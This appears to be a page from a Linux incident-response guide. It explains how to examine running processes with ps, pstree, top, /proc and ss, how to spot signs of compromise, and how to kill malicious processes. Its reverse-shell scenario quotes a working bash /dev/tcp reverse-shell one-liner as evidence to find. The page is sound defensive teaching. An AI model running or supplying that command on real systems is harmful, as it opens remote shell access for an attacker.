Processes

Process Analysis in Incident Response (Linux Systems)

Analyzing processes is a critical part of incident response on Linux systems. By investigating running processes, responders can uncover evidence of compromise, such as backdoors, malware, or unauthorized data exfiltration.

Key Concepts of Process Analysis

  1. What is a Process?

    • Process: A running instance of a program.

    • Attributes:

      • PID (Process Identifier): Unique ID for each process.

      • PPID (Parent Process ID): ID of the parent process.

      • User: Owner of the process.

      • Command: Executed program or script.

  2. Process Hierarchy

    • Parent processes spawn child processes.

    • The relationship forms a process tree.

  3. Process States

    • Running: Actively executing.

    • Waiting: Idle, waiting for resources.

    • Stopped: Paused by a signal.

    • Zombie: Completed but still in the process table.

Tools for Process Analysis

1. ps

Lists detailed information about running processes.

Common Commands:

ps aux               # List all processes with details.
ps aux --forest      # Display process tree.
ps -u username       # List processes for a specific user.
ps -C process_name   # List specific processes by name.

2. pstree

Displays processes as a tree, showing parent-child relationships.

pstree -p            # Show process tree with PIDs.

3. top

Real-time process monitoring.

Usage:

  • P: Sort by CPU usage.

  • M: Sort by memory usage.

  • C: Display full command paths.

top

4. /proc Directory

Contains detailed information about each process.

Important Files:

  • /proc/[PID]/status: Process status.

  • /proc/[PID]/cmdline: Command-line arguments.

  • /proc/[PID]/fd: Open file descriptors.

  • /proc/[PID]/environ: Environment variables.

Examples:

cat /proc/[PID]/cmdline    # View command-line arguments.
ls -l /proc/[PID]/fd       # List open files and sockets.

Steps for Process Analysis

1. List Active Processes

Identify all running processes using ps, pstree, or top.

Focus on:

  • Unusual Names: Processes with odd or generic names like reverse, miner, shell.

  • Service Accounts: Processes running under users like www-data or nobody.

2. Examine Parent-Child Relationships

Analyze relationships between processes.

Example:

pstree -p

  • Look for unexpected parent-child relationships.

    • Bash spawned under sshd: Indicates an active SSH session.

    • Reverse shell under nginx: Could signal a backdoor.

3. Investigate Command-Line Arguments

Check the arguments passed to a process.

Example:

cat /proc/[PID]/cmdline

Look for:

  • External IPs.

  • Sensitive Keywords: password, login, url, cmd.

4. Analyze Executable Paths

Identify where the process is running from:

ls -l /proc/[PID]/exe

  • Suspicious Locations:

    • /tmp/

    • /dev/shm/

    • /var/tmp/

5. Check Open Files and Network Connections

Inspect open files and sockets.

ls -l /proc/[PID]/fd      # List open file descriptors.
ss -p                     # Show processes using network sockets.

Quick Memory Analysis

Memory Mapping:

pmap [PID]

Shows memory regions used by a process. Look for unusual permissions or mappings.

Eradication of Malicious Processes

1. Kill Malicious Processes

Stop the malicious process immediately.

Kill by PID:

kill -9 [PID]

Kill All Instances by Name:

killall process_name

2. Remove Associated Files

Once processes are terminated, remove the related malicious files.

rm -rf /tmp/malicious_file

Indicators of Malicious Processes

  • Unusual Process Names: E.g., shell, reverse, scan.

  • Odd Locations: Processes running from /tmp, /dev/shm.

  • High Resource Usage: Excessive CPU/memory usage may indicate crypto-mining malware.

  • Suspicious Network Activity: Unexpected outbound connections or listening ports.

  • Unexpected Parent Processes: Shell or reverse shells spawned by nginx, httpd, etc.

Analyzing a Reverse Shell

Scenario:

A process named bash is running under nginx. You suspect a reverse shell.

Steps:

  1. List Processes:

    ps aux --forest

  2. Check Command Arguments:

    cat /proc/[PID]/cmdline

    Result:

    /bin/bash -i >& /dev/tcp/192.168.1.10/4444 0>&1

  3. Verify Network Connection:

    ss -tulnp | grep [PID]

  4. Terminate the Process:

    kill -9 [PID]

  5. Remove Associated Files:

    rm -rf /tmp/malicious_script.sh

Key Points

Process analysis is a crucial component of incident response on Linux systems. By leveraging tools such as ps, pstree, top, and /proc, you can detect and terminate malicious processes. Regular monitoring and analysis of processes help maintain system integrity and thwart potential threats.

PreviousUsers and GroupsNextFiles and File System

Last updated